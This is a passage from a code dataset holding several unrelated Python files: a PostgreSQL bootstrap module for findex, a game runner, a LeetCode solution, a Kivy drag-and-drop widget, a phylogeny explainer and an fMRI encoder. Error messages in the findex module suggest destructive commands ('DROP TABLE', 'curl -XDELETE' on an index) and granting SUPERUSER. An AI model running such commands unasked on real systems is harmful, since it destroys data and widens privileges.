echo=None):\n if echo is None:\n echo = False # config(\"findex:findex:debug\")\n\n self.engine = create_engine(\"postgresql+psycopg2://\",\n pool=self.pool,\n echo=echo)\n self.session = scoped_session(sessionmaker(autocommit=False,\n autoflush=True,\n expire_on_commit=True,\n bind=self.engine))\n BASE.query = self.session.query_property()\n\n def bootstrap(self):\n # check necessary postgres extensions\n self.create_extension(\n extension=\"pg_trgm\",\n msg_on_activate_error=\"Postgres extension \\\"pg_trgm\\\" installed but \"\n \"could not be enabled, \"\n \"possibly missing administrator rights to enable \"\n \"pg_trgm: `CREATE EXTENSION pg_trgm;`\")\n if config(\"findex:elasticsearch:enabled\"):\n self.create_extension(\n extension=\"zombodb\",\n msg_on_activate_error=\"Postgres extension \\\"zombodb\\\" installed but \"\n \"could not be enabled.\")\n\n # create the tables, types and indexes\n BASE.metadata.create_all(bind=self.engine)\n\n if config(\"findex:elasticsearch:enabled\"):\n # check required types for es\n if not self.check_type(type_name=\"type_files\"):\n raise DatabaseException(\n \"Postgres type `type files` not found. 
\"\n \"Try the following SQL to rebuild the table:\\n\"\n \"\\tDROP TYPE type_files CASCADE;\\n\"\n \"\\tDROP TABLE files;\\n\"\n )\n # check if the zombodb index is present\n if not self.check_index(table_name=\"files\", index=\"idx_zdb_files\"):\n raise DatabaseException(\n \"Postgres index `idx_zdb_files` not found \"\n \"while ElasticSearch was enabled.\\n\"\n \"Try the following SQL to rebuild the table:\\n\"\n \"\\tDROP TYPE type_files CASCADE;\\n\"\n \"\\tDROP TABLE files;\\n\"\n )\n else:\n if self.check_index(table_name=\"files\", index=\"idx_zdb_files\"):\n raise DatabaseException(\n \"Please remove the index `idx_zdb_files` before \"\n \"using findex without ES enabled:\\n\"\n \"\\tDROP INDEX idx_zdb_files\\n\"\n \"\\tcurl -XDELETE db.schema.table.index\"\n )\n\n from findex_gui.controllers.user.user import UserController\n from findex_gui.controllers.user.roles import default_anon_roles\n from findex_gui.controllers.resources.resources import ResourceController\n\n # add some default users, groups and tasks to the database\n if not UserController.user_view(username=\"root\"):\n UserController.user_add(\n username=\"root\",\n password=config(\"findex:users:default_root_password\"),\n removeable=False,\n admin=True,\n skip_authorization=True)\n\n if not UserController.user_view(username=\"anon\"):\n UserController.user_add(\n username=\"anon\",\n password=config(\"findex:users:default_anon_password\"),\n privileges=default_anon_roles,\n removeable=False,\n skip_authorization=True)\n\n if not ResourceController.get_resource_group(name=\"Default\"):\n ResourceController.add_resource_group(\n name=\"Default\",\n description=\"Default group\",\n removable=False,\n skip_authorization=True,\n log_error=False,\n ignore_constraint_conflict=True)\n\n def check_index(self, table_name: str, index: str):\n \"\"\"\n Checks for the presence of a given Postgres index\n :param table_name: name of the table\n :param index: name of the index\n :return: A :class:`sqlalchemy.engine.result.RowProxy` instance.\n \"\"\"\n sql = \"\"\"\n SELECT schemaname, tablename, indexname, indexdef FROM pg_indexes\n WHERE tablename = :table_name AND indexname = :index;\"\"\"\n return self.session.execute(text(sql), params={\"table_name\": table_name, \"index\": index}).fetchone()\n\n def check_type(self, type_name: str):\n \"\"\"\n Checks for the presence of a given Postgres type\n :param type_name: name of the type\n :return: A :class:`sqlalchemy.engine.result.RowProxy` instance if found.\n \"\"\"\n sql = \"\"\"\n SELECT\n n.nspname AS schema,\n t.typname AS type\n FROM pg_type t\n LEFT JOIN pg_catalog.pg_namespace n ON n.oid = t.typnamespace\n WHERE (t.typrelid = 0 OR (SELECT c.relkind = 'c'\n FROM pg_catalog.pg_class c\n WHERE c.oid = t.typrelid))\n AND NOT EXISTS(SELECT 1\n FROM pg_catalog.pg_type el\n WHERE el.oid = t.typelem AND el.typarray = t.oid)\n AND n.nspname NOT IN ('pg_catalog', 'information_schema')\n AND t.typname=:type_name;\"\"\"\n return self.session.execute(text(sql), params={\"type_name\": type_name}).fetchone()\n\n def check_extension(self, extension: str):\n \"\"\"\n Checks for the presence of a given Postgres extension\n :param extension: name of the extension\n :return: A :class:`sqlalchemy.engine.result.RowProxy` instance if found.\n \"\"\"\n sql = \"\"\"\n SELECT name,installed_version FROM pg_available_extensions WHERE name=:extension\"\"\"\n return self.session.execute(text(sql), params={\"extension\": extension}).fetchone()\n\n def create_extension(self, extension: str, 
msg_on_activate_error: str):\n \"\"\"\n Tries to activate a Postgres extension\n :param extension: name of the Postgres extension\n :param msg_on_activate_error: exception message to raise when the\n extension could not be activated\n :return:\n \"\"\"\n extension = self.check_extension(extension)\n if not extension:\n raise DatabaseException(\"Postgres extension \\\"%s\\\" not installed\" % extension)\n\n if not extension.installed_version:\n try:\n self.session.execute(\"CREATE EXTENSION %s\" % re.sub(r'\\W+', '', extension.name))\n self.session.commit()\n self.session.flush()\n except Exception as ex:\n if \"permission denied\" in str(ex):\n sys.stderr.write(str(ex))\n sys.stderr.write(\"\\n\\nDatabase user not admin.\\n\\nSQL: ALTER USER myuser WITH SUPERUSER; \")\n sys.exit()\n raise Exception(ex)\n\n extension = self.check_extension(extension.name)\n if not extension:\n raise DatabaseException(\"Postgres extension \\\"%s\\\" not installed\" % extension)\n if not extension.installed_version:\n raise DatabaseException(msg_on_activate_error)\n else:\n logging.debug(\"Enabled database extension \\\"%s\\\"\" % extension)\n\n def _getconn(self):\n # random.shuffle(self.hosts)\n # for host in self.hosts:\n logging.info(\"connecting to: %s\" % self.dsn)\n try:\n return psycopg2.connect(self.dsn, connect_timeout=3)\n except psycopg2.OperationalError as e:\n print('Failed to connect to %s: %s' % (self.dsn, e))\n raise psycopg2.OperationalError(\"Ran out of database servers - exiting\")\n","sub_path":"findex_gui/orm/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":8768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"147024900","text":"import time\n\nfrom isolation import Board\n\nfrom sample_players import GreedyPlayer\n\nfrom game_agent import CustomPlayer\n\nplayer_1 = CustomPlayer()\n\nplayer_2 = GreedyPlayer()\n#player_2 = RandomPlayer()\n\nprint(player_1,player_2)\n\ntest_game = Board(player_1, player_2)\nstart = time.time()\nwinner, moves, reason = test_game.play()\nend = time.time()\n#print (winner)\nif reason == \"timeout\":\n print(\"Forfeit due to timeout.\")\nfor move in moves:\n print(move)\n\nprint('Play Summary : Time taken = {0}, number of move = {1}, winner= {2}, Reason ={3}' .format(end-start, len(moves),winner,reason))","sub_path":"play_game_wrapper.py","file_name":"play_game_wrapper.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"616554248","text":"#!/anaconda3/bin/python\n\nimport sys\n\nclass Solution(object):\n def longestValidParentheses(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n slen = len(s)\n flag = [0] * slen\n stack = []\n for i in range(slen):\n if s[i] == '(':\n stack.append(i)\n else:\n if stack:\n flag[stack.pop()] = 1\n flag[i] = 1\n maxlen = 0\n tmp = 0\n for i in range(slen):\n if flag[i] == 1:\n tmp += flag[i]\n maxlen = max(tmp, maxlen)\n else:\n tmp = 0\n return maxlen\n\nif __name__ == \"__main__\":\n a = Solution()\n s = \"())\"\n print(a.longestValidParentheses(s))\n\n \n\n","sub_path":"q32.py","file_name":"q32.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"409267439","text":"#\n# Copyright 2012, 2013, 2014, 2015, 2016 Pavel Kostelník\n# Copyright 2016 Michael Anthony Schwager\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may 
not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# This is the DragNDropWidget class. It allows the Kivy programmer to\n# drag a widget from one container and drop it into another.\n\nfrom kivy.core.window import Window\nfrom kivy.animation import Animation\nimport copy\nfrom kivy.uix.widget import Widget\nfrom kivy.properties import (\n ListProperty, NumericProperty, BooleanProperty, ObjectProperty)\n\n\nclass DragNDropWidget(Widget):\n # let kivy take care of kwargs and get signals for free by using\n # properties\n droppable_zone_objects = ListProperty([])\n bound_zone_objects = ListProperty([])\n drag_opacity = NumericProperty(1.0)\n drop_func = ObjectProperty(None)\n drop_args = ListProperty([])\n failed_drop_func = ObjectProperty(None)\n failed_drop_args = ListProperty([])\n remove_on_drag = BooleanProperty(True)\n drop_ok_animation_time = NumericProperty(0.5)\n not_drop_ok_animation_time = NumericProperty(0.2)\n\n def __init__(self, **kw):\n super(DragNDropWidget, self).__init__(**kw)\n\n self.register_event_type(\"on_drag_start\")\n self.register_event_type(\"on_being_dragged\")\n self.register_event_type(\"on_drag_finish\")\n self.register_event_type(\"on_motion_over\")\n self.register_event_type(\"on_motion_out\")\n self._old_opacity = self.opacity\n self._drag_started = False\n self._dragged = False\n self._draggable = True\n self._fired_already = False\n self.copy = False\n self.touch_offset_x = 0\n self.touch_offset_y = 0\n self.drop_recipients = []\n self.am_touched = False\n if not self.drop_func:\n self.drop_func = self.drop_function\n\n def set_draggable(self, value):\n self._draggable = value\n\n def set_remove_on_drag(self, value):\n \"\"\"\n This function sets the property that determines whether the dragged widget is just\n copied from its parent or taken from its parent.\n @param value: either True or False. 
If True then the widget will disappear from its\n parent on drag, else the widget will just get copied for dragging\n \"\"\"\n self.remove_on_drag = value\n\n def set_drag_start_state(self):\n self._move_counter = 0\n self._old__opacity = self.opacity\n self.opacity = self.drag_opacity\n self.set_bound_axis_positions()\n self._old_drag_pos = self.pos\n self._old_parent = self.parent\n self._old_parent_children_reversed_list = self.parent.children[:]\n self._old_parent_children_reversed_list.reverse()\n if self.copy:\n self._old_index = -1\n else:\n self._old_index = self.parent.children.index(self)\n self._drag_started = True\n\n def set_drag_finish_state(self):\n self._drag_started = False\n self.opacity = self._old_opacity\n\n def set_bound_axis_positions(self):\n for obj in self.bound_zone_objects:\n try:\n if self.max_y < obj.y+obj.size[1]-self.size[1]:\n self.max_y = obj.y+obj.size[1]-self.size[1]\n except AttributeError:\n self.max_y = obj.y+obj.size[1]-self.size[1]\n try:\n if self.max_x < obj.x+obj.size[0]-self.size[0]:\n self.max_x = obj.x + obj.size[0]-self.size[0]\n except AttributeError:\n self.max_x = obj.x+obj.size[0]-self.size[0]\n try:\n if self.min_y > obj.y:\n self.min_y = obj.y\n except AttributeError:\n self.min_y = obj.y\n try:\n if self.min_x > obj.x:\n self.min_x = obj.x\n except AttributeError:\n self.min_x = obj.x\n\n def on_touch_down(self, touch):\n\n if self.collide_point(touch.x, touch.y) and self._draggable:\n # detect if the touch is short - has time and end (if not dispatch drag)\n if abs(touch.time_end - touch.time_start) > 0.2:\n self.touch_offset_x = touch.x - self.x\n self.touch_offset_y = touch.y - self.y\n self.am_touched = True\n\n def on_touch_up(self, touch):\n if self.am_touched:\n self.am_touched = False\n if self._draggable and self._dragged:\n self.short_touch = True\n self.touch_x = touch.x\n self.touch_y = touch.y\n self.dispatch(\"on_drag_finish\")\n self.short_touch = False\n else:\n self.opacity = self._old_opacity\n\n\n def on_touch_move(the_widget, touch):\n if the_widget.am_touched:\n if not the_widget._drag_started:\n the_widget.dispatch(\"on_drag_start\")\n the_widget.am_touched = False\n\n if not the_widget._drag_started:\n return\n the_widget._move_counter += 1\n if the_widget._draggable and the_widget._drag_started:\n # if the_widget._dragged and the_widget._draggable:\n the_widget._dragged = True\n x = touch.x - the_widget.touch_offset_x\n y = touch.y - the_widget.touch_offset_y\n\n try:\n if x <= the_widget.min_x:\n x = the_widget.min_x\n if x > the_widget.max_x:\n x = the_widget.max_x\n if y <= the_widget.min_y:\n y = the_widget.min_y\n if y > the_widget.max_y:\n y = the_widget.max_y\n except AttributeError:\n pass\n the_widget.pos = (x, y)\n # SPECIAL! 
Takes a herky-jerky GUI and makes it smoooooth....\n the_widget.canvas.ask_update()\n\n\n\n def easy_access_dnd(self, function_to_do, function_to_do_out, arguments = [], bind_functions = []):\n \"\"\"\n This function enables something that can be used instead of drag n drop\n @param function_to_do: function that is to be called when mouse_over event is fired on the widget\n @param bind_functions: what is really to be done - background function for GUI functionality\n \"\"\"\n Window.bind(mouse_pos=self.on_motion)\n self.easy_access_dnd_function = function_to_do\n self.easy_access_dnd_function_out = function_to_do_out\n self.easy_access_dnd_function_arguments = arguments\n self.easy_access_dnd_function_binds = bind_functions\n\n def on_motion(self, etype, moutionevent):\n if self.collide_point(Window.mouse_pos[0], Window.mouse_pos[1]):\n if not self._fired_already:\n self.dispatch(\"on_motion_over\")\n else:\n self.dispatch(\"on_motion_out\")\n\n def on_motion_over(self):\n self.easy_access_dnd_function(\n self.easy_access_dnd_function_arguments,\n self.easy_access_dnd_function_binds)\n\n self._fired_already = True\n\n def on_motion_out(self):\n try:\n self.easy_access_dnd_function_out()\n except AttributeError:\n pass\n self._fired_already = False\n\n def deepen_the_copy(self, copy_of_self):\n copy_of_self.copy = True\n copy_of_self.parent = self.parent\n copy_of_self.droppable_zone_objects = self.droppable_zone_objects\n copy_of_self.nbound_zone_objects = self.bound_zone_objects\n copy_of_self.drag_opacity = self.drag_opacity\n copy_of_self.drop_func = self.drop_func\n copy_of_self.drop_args = self.drop_args\n copy_of_self.failed_drop_func = self.failed_drop_func\n copy_of_self.failed_drop_args = self.failed_drop_args\n copy_of_self.remove_on_drag = self.remove_on_drag\n copy_of_self.drop_ok_animation_time = self.drop_ok_animation_time\n copy_of_self.not_drop_ok_animation_time = self.not_drop_ok_animation_time\n copy_of_self.touch_offset_x = self.touch_offset_x\n copy_of_self.touch_offset_y = self.touch_offset_y\n copy_of_self.drop_recipients = self.drop_recipients\n copy_of_self.droppable_zone_objects = self.droppable_zone_objects\n copy_of_self.bound_zone_objects = self.bound_zone_objects\n copy_of_self.drag_opacity = self.drag_opacity\n copy_of_self.drop_func = self.drop_func\n copy_of_self.remove_on_drag = self.remove_on_drag\n\n def on_drag_start(self):\n if self._drag_started:\n return\n # self._dragged = True\n if not self.remove_on_drag:\n #create copy of object to drag\n copy_of_self = copy.deepcopy(self)\n # We'll handle those variables that are common to ALL d-n-d\n # widgets. The widgets' classes can handle specifics\n # (such as text, etc.)\n self.deepen_the_copy(copy_of_self)\n\n copy_of_self.set_drag_start_state()\n copy_of_self.root_window = self.parent.get_root_window()\n ## the final child class MUST implement __deepcopy__\n ## IF self.remove_on_drag == False !!! 
In this case this is\n ## met in draggableArhellModelImage class\n # TODO: MIKE: it used to be that copy_of_self was added to _old_parent\n # self._old_parent.add_widget(copy_of_self, index=self._old_index)\n copy_of_self.root_parent(copy_of_self)\n copy_of_self.pos = self.pos\n else:\n self.set_drag_start_state()\n self.root_window = self.parent.get_root_window()\n self.root_parent(self)\n\n\n def on_drag_finish(self):\n # Don't worry, opacity will be properly set in set_drag_finish_state*)\n # after the animation\n self.opacity = 1.0\n del self.drop_recipients[:]\n if self._dragged and self._draggable:\n dropped_ok = False\n for obj in self.droppable_zone_objects:\n if obj.collide_point(self.touch_x, self.touch_y):\n self.drop_recipients.append(obj)\n if obj is self._old_parent:\n dropped_ok = False\n else:\n dropped_ok = True\n if dropped_ok:\n self.drop_func(*self.drop_args)\n for obj in self.drop_recipients:\n if \"drop_func\" in dir(obj):\n obj.drop_func(self)\n anim = Animation(opacity=0, duration=self.drop_ok_animation_time, t=\"in_quad\")\n anim.bind(on_complete=self.un_root_parent)\n anim.start(self)\n else:\n self.failed_drop_func(*self.failed_drop_args)\n anim = Animation(pos=self._old_drag_pos, duration=self.not_drop_ok_animation_time,\n t=\"in_quad\")\n if self.remove_on_drag:\n anim.bind(on_complete = self.reborn)\n else:\n anim.bind(on_complete = self.un_root_parent)\n anim.start(self)\n self._dragged = False\n self.set_drag_finish_state()\n\n def un_root_parent(self, widget=\"dumb\", anim=\"dumb2\"):\n self.get_root_window().remove_widget(self)\n\n def on_being_dragged(self):\n pass\n\n def reborn(self, widget, anim):\n self.un_root_parent()\n # BUG: We don't just add the reborn child to the parent.\n # Adding child in the first position (the highest index) fails due\n # to a bug in Kivy. 
We remove all remaining children and then re-add\n # the bunch (including the original child which was not dropped in a new\n # area).\n for childs in self._old_parent.children[:]:\n self._old_parent.remove_widget(childs)\n for childs in self._old_parent_children_reversed_list:\n self._old_parent.add_widget(childs)\n return\n #As of this moment, this code is unreachable- it's a placeholder.\n # See https://github.com/kivy/kivy/issues/4497\n self._old_parent.add_widget(self, index=self._old_index)\n\n def root_parent(self, widget):\n orig_size = widget.size\n if not self.remove_on_drag:\n self.root_window.add_widget(widget)\n return\n if widget.parent:\n parent = widget.parent\n parent.remove_widget(widget)\n parent.get_root_window().add_widget(widget)\n widget.size_hint = (None, None)\n widget.size = orig_size\n\n def drop_func(self, *args):\n pass\n","sub_path":"DragNDropWidget.py","file_name":"DragNDropWidget.py","file_ext":"py","file_size_in_byte":13012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"300452883","text":"from collections import Counter\nfrom itertools import combinations\nfrom typing import TypeVar\n\nfrom graph.UndirectedGraph import Graph\nfrom helpers.InputUtils import str_to_list\nfrom helpers.Utils import slide_window\n\nN = TypeVar('N')\nND = TypeVar('ND')\nE = TypeVar('E')\n\n\ndef create_tree(edges: list[list[str, str]]) -> Graph:\n g = Graph()\n for n in {n for e in edges for n in e}:\n g.insert_node(n)\n for n1, n2 in edges:\n g.insert_edge(f'{n1}-{n2}', n1, n2)\n return g\n\n\ndef find_nodes_between_leaves(g: Graph, n: N, end_n: N, n_walk: list[N]):\n n_walk.append(n)\n if n == end_n:\n return True\n for e in g.get_outputs(n):\n n1, n2, _ = g.get_edge(e)\n if len(n_walk) >= 2 and {n1, n2} == {n_walk[-1], n_walk[-2]}:\n continue\n next_n = next(iter({n1, n2}.difference({n})))\n done = find_nodes_between_leaves(g, next_n, end_n, n_walk)\n if done:\n return True\n n_walk.pop()\n\n\nclass EdgeCounter:\n def __init__(self, tree: Graph[N, ND, E, float]):\n self.tree = tree\n self.leaf_nodes = [n for n in tree.get_nodes() if len(tuple(tree.get_outputs(n))) == 1]\n self.leaf_count = len(self.leaf_nodes)\n\n def path(self, n: N, end_n: N) -> list[E]:\n edges = []\n nodes = []\n find_nodes_between_leaves(self.tree, n, end_n, nodes)\n for (n1, n2), _ in slide_window(nodes, 2):\n found_edge = None\n for edge_id in self.tree.get_outputs(n1):\n _end1, _end2, _ed = self.tree.get_edge(edge_id)\n if n2 not in {_end1, _end2}:\n continue\n if found_edge is not None:\n raise ValueError(f'Multiple edges to same node not allowed: {n1, n2}')\n found_edge = edge_id\n if found_edge is None:\n raise ValueError(f'No edge found: {n1, n2}')\n edges.append(found_edge)\n return edges\n\n # MARKDOWN_COUNT\n def edge_count(self, l1: N) -> Counter[E]:\n # Collect paths from l1 to all other leaf nodes\n path_collection = []\n for l2 in self.leaf_nodes:\n if l1 == l2:\n continue\n path = self.path(l1, l2)\n path_collection.append(path)\n # Count edges across all paths\n edge_counts = Counter()\n for path in path_collection:\n edge_counts.update(path)\n # Return edge counts\n return edge_counts\n # MARKDOWN_COUNT\n\n # MARKDOWN_COMBINE_COUNT\n def combine_edge_count(self, l1: N, l2: N) -> Counter[E]:\n c1 = self.edge_count(l1)\n c2 = self.edge_count(l2)\n return c1 + c2\n # MARKDOWN_COMBINE_COUNT\n\n # MARKDOWN_NORMALIZED_COMBINE_COUNT\n def combine_edge_count_and_normalize(self, l1: N, l2: N) -> Counter[E]:\n edge_counts = 
self.combine_edge_count(l1, l2)\n path_edges = self.path(l1, l2)\n for e in path_edges:\n edge_counts[e] -= self.leaf_count - 2\n return edge_counts\n # MARKDOWN_NORMALIZED_COMBINE_COUNT\n\n # MARKDOWN_NEIGHBOUR_PATH_EDGE_COUNT_CHECK\n def neighbour_check(self, l1: N, l2: N) -> bool:\n path_edges = self.path(l1, l2)\n return len(path_edges) == 2\n # MARKDOWN_NEIGHBOUR_PATH_EDGE_COUNT_CHECK\n\n # MARKDOWN_REDUCE_TO_2_TEST\n def reduced_to_2_check(self, l1: N, l2: N) -> bool:\n p = self.path(l1, l2)\n c = self.combine_edge_count_and_normalize(l1, l2)\n return all(c[edge] == 2 for edge in p) # if counts for all edges in p reduced to 2\n # MARKDOWN_REDUCE_TO_2_TEST\n\n # MARKDOWN_SEGREGATE_BY_EDGE\n def segregate_leaves(self, internal_edge: E) -> dict[N, N]:\n leaf_to_end = {} # leaf -> one of the ends of internal_edge\n e1, e2 = self.tree.get_edge_ends(internal_edge)\n for l1 in self.leaf_nodes:\n # If path from l1 to e1 ends with internal_edge, it means that it had to\n # walk over the internal edge to get to e1, which ultimately means that l1\n # it isn't on the e1 side / it's on the e2 side. Otherwise, it's on the e1\n # side.\n p = self.path(l1, e1)\n if p[-1] != internal_edge:\n leaf_to_end[l1] = e1\n else:\n leaf_to_end[l1] = e2\n return leaf_to_end\n # MARKDOWN_SEGREGATE_BY_EDGE\n\n # MARKDOWN_NEIGHBOUR_DETECT\n def neighbour_detect(self) -> tuple[int, tuple[N, N]]:\n found_pair = None\n found_total_count = -1\n for l1, l2 in combinations(self.leaf_nodes, r=2):\n normalized_counts = self.combine_edge_count_and_normalize(l1, l2)\n total_count = sum(c for c in normalized_counts.values())\n if total_count > found_total_count:\n found_pair = l1, l2\n found_total_count = total_count\n return found_total_count, found_pair\n # MARKDOWN_NEIGHBOUR_DETECT\n\n def to_dot(self) -> str:\n ret = 'graph G {\\n'\n ret += ' graph[rankdir=LR]\\n'\n ret += ' node[shape=circle, fontname=\"Courier-Bold\", fontsize=10, width=0.4, height=0.4, fixedsize=true]\\n'\n ret += ' edge[fontname=\"Courier-Bold\", fontsize=10]\\n'\n nodes = sorted(self.tree.get_nodes())\n for n in nodes:\n ret += f'{n}\\n'\n for e in self.tree.get_edges():\n n1, n2 = self.tree.get_edge_ends(e)\n ret += f'{n1} -- {n2} [label=\" \"]\\n'\n ret += '}'\n return ret\n\n def combine_count_and_normalize_all_to_dot_subgraph(self) -> str:\n ret = 'graph G {\\n'\n ret += ' graph[rankdir=LR]\\n'\n ret += ' node[shape = circle, fontname=\"Courier-Bold\", fontsize=10, width=0.4, height=0.4, fixedsize=true]\\n'\n ret += ' edge[fontname=\"Courier-Bold\", fontsize=10]\\n'\n ret += ' ranksep=0.25\\n'\n ret += ' fontname=\"Courier-Bold\"\\n'\n ret += ' fontsize=10\\n'\n for l1, l2 in combinations(sorted(self.leaf_nodes), r=2):\n c = self.combine_edge_count_and_normalize(l1, l2)\n ret += f' subgraph cluster_{l1}{l2} {{\\n'\n ret += f' label=\"combine_count_and_normalize({l1},{l2})\"\\n'\n nodes = self.tree.get_nodes()\n for n in nodes:\n ret += f' {l1}{l2}_{n} [label=\"{n}\"'\n if n == l1 or n == l2:\n ret += ', style=filled, fillcolor=gray'\n ret += ']\\n'\n for e in self.tree.get_edges():\n n1, n2 = self.tree.get_edge_ends(e)\n ret += f' {l1}{l2}_{n1} -- {l1}{l2}_{n2} [label=\" \", penwidth=\"2.5\", color=\"{\":invis:\".join([\"black\"] * c[e])}\"]\\n'\n ret += '}\\n'\n ret += '}'\n return ret\n\n\ndef main():\n print(\"
<div style=\\\"border:1px solid black;\\\">\", end=\"\\n\\n\")\n print(\"`{bm-disable-all}`\", end=\"\\n\\n\")\n try:\n edges, _ = str_to_list(input().strip(), 0)\n tree = create_tree(edges)\n cntr = EdgeCounter(tree)\n print('Given the tree...')\n print()\n print('```{dot}')\n print(f'{cntr.to_dot()}')\n print('```')\n print()\n count, (l1, l2) = cntr.neighbour_detect()\n print(f'neighbour_detect reported that {l1} and {l2} have the highest total edge count of {count} and as such '\n f'are guaranteed to be neighbours.')\n print()\n print('For each leaf pair in the tree, `combine_count_and_normalize()` totals are ... ')\n print()\n print('<table>')\n print('<thead>')\n print('<tr>')\n print('<th></th>')\n for l in sorted(cntr.leaf_nodes):\n print(f'<th>{l}</th>')\n print('</tr>')\n print('</thead>')\n print('<tbody>')\n for l1 in sorted(cntr.leaf_nodes):\n print('<tr>')\n print(f'<td>{l1}</td>')\n for l2 in sorted(cntr.leaf_nodes):\n if l1 == l2:\n res = 0\n else:\n res = sum(cntr.combine_edge_count_and_normalize(l1, l2).values())\n print(f'<td>{res}</td>')\n print('</tr>')\n print('</tbody>')\n print('</table>')\n print()\n print('```{dot}')\n print(f'{cntr.combine_count_and_normalize_all_to_dot_subgraph()}')\n print('```')\n finally:\n print(\"</div>
\", end=\"\\n\\n\")\n print(\"`{bm-enable-all}`\", end=\"\\n\\n\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"docs/data/learn/Bioinformatics/output/ch8_code/src/ch7_copy/phylogeny/NeighbourJoiningMatrix_EdgeCountExplainer.py","file_name":"NeighbourJoiningMatrix_EdgeCountExplainer.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"384995708","text":"from __future__ import division\nimport numpy as np\nfrom sklearn.linear_model import Ridge\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom scipy.stats import multivariate_normal\nfrom inspect import isclass\nfrom sklearn.decomposition import PCA\nfrom scipy.misc import logsumexp\nfrom sklearn.base import BaseEstimator\nfrom sklearn.model_selection._split import _BaseKFold\nfrom sklearn.utils.validation import _num_samples\nimport warnings\n\nclass CustomSplitKFold(_BaseKFold):\n \"\"\"K-Fold cross validation with custom splits\n Expects as splits a list of indices that indicate boundaries between runs\"\"\"\n def __init__(self, splits=None):\n if splits is None:\n raise ValueError('Need to provide a list of indices for splits')\n else:\n self.splits = splits\n self.n_splits = len(self.splits)\n\n def _iter_test_indices(self, X, y=None, groups=None):\n num_samples = _num_samples(X)\n indices = np.arange(num_samples)\n split_indices = np.array_split(indices, self.splits)\n for splits in split_indices:\n yield splits\n\n\ndef select_ridge_output(ridge, select_voxels):\n '''Returns a new Ridge object containing only coefs for select_voxels'''\n from copy import deepcopy\n ridge_copy = deepcopy(ridge)\n ridge_copy.coef_ = ridge.coef_[select_voxels]\n ridge_copy.intercept_ = ridge.intercept_[select_voxels]\n if ridge.alpha.size > 1:\n ridge_copy.alpha = ridge.alpha[select_voxels]\n return ridge_copy\n\n\ndef run_split_from_labels(labels, label_occ=3):\n '''Computes when a new run starts from labels\n Returns a list of numbers each number indicating the first sample in each run\n It assumes that in each run each label occurs label_occ times, thus the label_occ+1 time a label is found, a new run has started'''\n from collections import Counter\n counter = Counter()\n run_samples = []\n for i, label in enumerate(labels):\n if counter[label] == label_occ:\n run_samples.append(i)\n counter.clear()\n counter[label] += 1\n return run_samples\n\n\ndef compute_stability(fmri, labels):\n '''Computes stability score for each voxel\n Uses spearman correlation coefficient'''\n from scipy.stats import spearmanr\n from functools import reduce\n run_samples = run_split_from_labels(labels)\n runs_fmri = np.array_split(fmri, run_samples, axis=0)\n runs_labels = np.array_split(labels, run_samples)\n runs_fmri = [run_fmri[np.argsort(run_labels)][None]\n for run_fmri, run_labels in zip(runs_fmri, runs_labels)]\n try:\n runs_fmri = np.concatenate(runs_fmri)\n except ValueError:\n warnings.warn('One of the runs has less stimuli than the others. 
Proceeding by aligning number of stimuli.',\n RuntimeWarning)\n shared_stimuli_in_all_runs = reduce(\n np.intersect1d, [np.unique(run_labels) for run_labels in runs_labels])\n runs_fmri = [run_fmri[:, np.isin(run_labels, shared_stimuli_in_all_runs)]\n for run_labels, run_fmri in zip(runs_labels, runs_fmri)]\n runs_fmri = np.concatenate(runs_fmri)\n\n stability = np.array([spearmanr(voxel, axis=0)[0][np.triu_indices(len(run_samples))].mean()\n for voxel in runs_fmri.T])\n return stability\n\n\ndef transform_select_voxels(X, select_voxels=None):\n if select_voxels is None:\n select_voxels = np.arange(X.shape[1])\n return X[:, select_voxels]\n\ndef inverse_transform_select_voxels(X_transformed, select_voxels=None):\n if select_voxels is None:\n select_voxels = np.arange(X_transformed.shape[1])\n X = np.zeros((X_transformed.shape[0], select_voxels.shape[0]))\n X[:, select_voxels] = X_transformed\n return X\n\ndef mve_score(mve, stimulus, fmri, labels, scoring='new'):\n '''For fitted MultiVoxelEncoding object mve.\n returns the decoding accuracy for stimuli,fmri'''\n catdist = np.zeros((25, 5))\n probdist = np.zeros((25, 25))\n for ilbl, lbl in enumerate(np.unique(labels)):\n lbl_given_r = np.array([\n np.sum(\n mve.score(stimulus[np.where(labels==alt_lbl)[0],:],\n fmri[np.where(labels==lbl)[0],:]))\n for alt_lbl in np.unique(labels)])\n probdist[ilbl,:] = lognormalize2(lbl_given_r)\n catdist[ilbl,:] = lognormalize2(logsumexp(np.reshape(lbl_given_r,(5,-1)), axis=1))\n catpbz = np.zeros(catdist.shape)\n maxes = np.argmax(catdist,axis=1)\n catpbz[np.arange(25),maxes] = 1\n pbz = np.zeros(probdist.shape)\n maxes = np.argmax(probdist,axis=1)\n pbz[np.arange(25),maxes] = 1\n\n return (np.sum(np.reshape(catpbz,(5,5,5)),1),pbz)\n\nclass MultiVoxelEncoding(BaseEstimator):\n def __init__(self, models=Ridge, n_components=0.95, cv=None, scoring=None):\n if cv is not None:\n if not isinstance(n_components,list):\n raise RuntimeError('n_components needs to be a'\n 'list for cross-validation')\n if not all(isinstance(n, int) for n in n_components):\n raise RuntimeError('all elements of n_components need '\n 'to be integers')\n\n self.models = models\n self.n_components = n_components\n self.cv = cv\n self.scoring = scoring\n self.pca = None\n self.pca_cov = None\n\n def _pca_transform(self, y):\n pca_y = self.pca.transform(y)\n return pca_y/np.linalg.norm(pca_y)\n\n def fit(self, X, y, labels=None):\n if 